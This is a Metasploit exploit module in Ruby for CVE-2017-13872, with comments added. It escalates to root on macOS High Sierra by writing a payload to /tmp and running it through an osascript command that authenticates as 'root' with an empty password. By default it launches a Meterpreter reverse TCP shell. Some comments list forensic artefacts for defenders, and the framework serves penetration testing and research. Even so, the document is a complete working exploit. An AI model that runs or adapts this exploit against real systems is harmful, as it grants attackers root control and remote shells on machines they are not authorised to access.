##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

# Local privilege-escalation module for CVE-2017-13872 (see 'References'
# below): on macOS High Sierra the "root" account could be authenticated
# with an empty password. The module uses that to run the selected payload
# as root from an existing unprivileged session.
#
# Mixins used here:
#   Msf::Post::File          - write_file / cmd_exec on the target
#   Msf::Post::OSX::Priv     - presumably provides is_root? (not shown here)
#   Msf::Exploit::EXE        - native payload generation (payload.raw)
#   Msf::Exploit::FileDropper - register_file_for_cleanup
class MetasploitModule < Msf::Exploit::Local
  Rank = ExcellentRanking

  include Msf::Post::File
  include Msf::Post::OSX::Priv
  include Msf::Exploit::EXE
  include Msf::Exploit::FileDropper

  # Module metadata only; no target interaction happens here.
  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Mac OS X Root Privilege Escalation',
        'Description' => %q{
          This module exploits a serious flaw in MacOSX High Sierra.
          Any user can login with user "root", leaving an empty password.
        },
        'License' => MSF_LICENSE,
        'References' => [
          [ 'CVE', '2017-13872' ],
          [ 'URL', 'https://twitter.com/lemiorhan/status/935578694541770752' ],
          [ 'URL', 'https://news.ycombinator.com/item?id=15800676' ],
          [ 'URL', 'https://forums.developer.apple.com/thread/79235' ],
        ],
        'Platform' => 'osx',
        'Arch' => ARCH_X64,
        'Author' => [
          'chethan177', # earliest public discovery
          'lemiorhan', # making this well-known via Twitter
          'timwr', # Metasploit module
        ],
        'DefaultOptions' => {
          'PAYLOAD' => 'osx/x64/meterpreter_reverse_tcp',
        },
        'SessionTypes' => [ 'shell', 'meterpreter' ],
        'Targets' => [
          [ 'Mac OS X 10.13.1 High Sierra x64 (Native Payload)', {} ]
        ],
        'DefaultTarget' => 0,
        'DisclosureDate' => '2017-11-29',
        # Reliability / stability / side effects were never characterised
        # by the author; all three are left at the UNKNOWN_* placeholders.
        'Notes' => {
          'Reliability' => UNKNOWN_RELIABILITY,
          'Stability' => UNKNOWN_STABILITY,
          'SideEffects' => UNKNOWN_SIDE_EFFECTS
        }
      )
    )
  end

  # Builds the osascript one-liner that runs +root_payload+ through
  # AppleScript's `do shell script ... with administrator privileges`,
  # authenticating as user name "root" with an empty password. That empty
  # password is the vulnerability being exercised; the command itself is
  # the observable artefact a defender would look for (an osascript process
  # whose arguments contain `user name "root" password ""`).
  #
  # +root_payload+ is interpolated into a shell string without quoting; in
  # this module it is only ever the /tmp path generated in +exploit+, which
  # consists of lowercase letters, so no shell metacharacters reach it.
  #
  # @param root_payload [String] path of the executable to run as root
  # @return [String] the full osascript command line
  def exploit_cmd(root_payload)
    "osascript -e 'do shell script \"#{root_payload}\" user name \"root\" password \"\" with administrator privileges'"
  end

  # Drops the native payload into /tmp under a random 12-letter name, marks
  # it executable, and launches it via +exploit_cmd+. The sequence is
  # order-dependent: the file must exist before chmod, and be executable
  # before osascript runs it.
  #
  # Host-side artefacts this leaves, useful for detection/forensics:
  #   * a new file /tmp/<12 lowercase letters> containing the raw payload
  #   * a `chmod +x` of that file from the session's shell
  #   * an osascript invocation with administrator privileges as "root"
  # The file is registered with FileDropper so the framework removes it
  # when the session is cleaned up.
  #
  # @raise [Msf::Exploit::Failed] via fail_with when the session is already root
  def exploit
    # Nothing to escalate if the session already runs as root.
    if is_root?
      fail_with Failure::BadConfig, 'Session already has root privileges'
    end

    payload_file = "/tmp/#{Rex::Text::rand_text_alpha_lower(12)}"
    print_status("Writing payload file as '#{payload_file}'")
    write_file(payload_file, payload.raw)
    register_file_for_cleanup(payload_file)
    # The chmod output is captured in +output+ but not inspected here.
    output = cmd_exec("chmod +x #{payload_file}")
    print_status("Executing payload file as '#{payload_file}'")
    cmd_exec(exploit_cmd(payload_file))
  end
end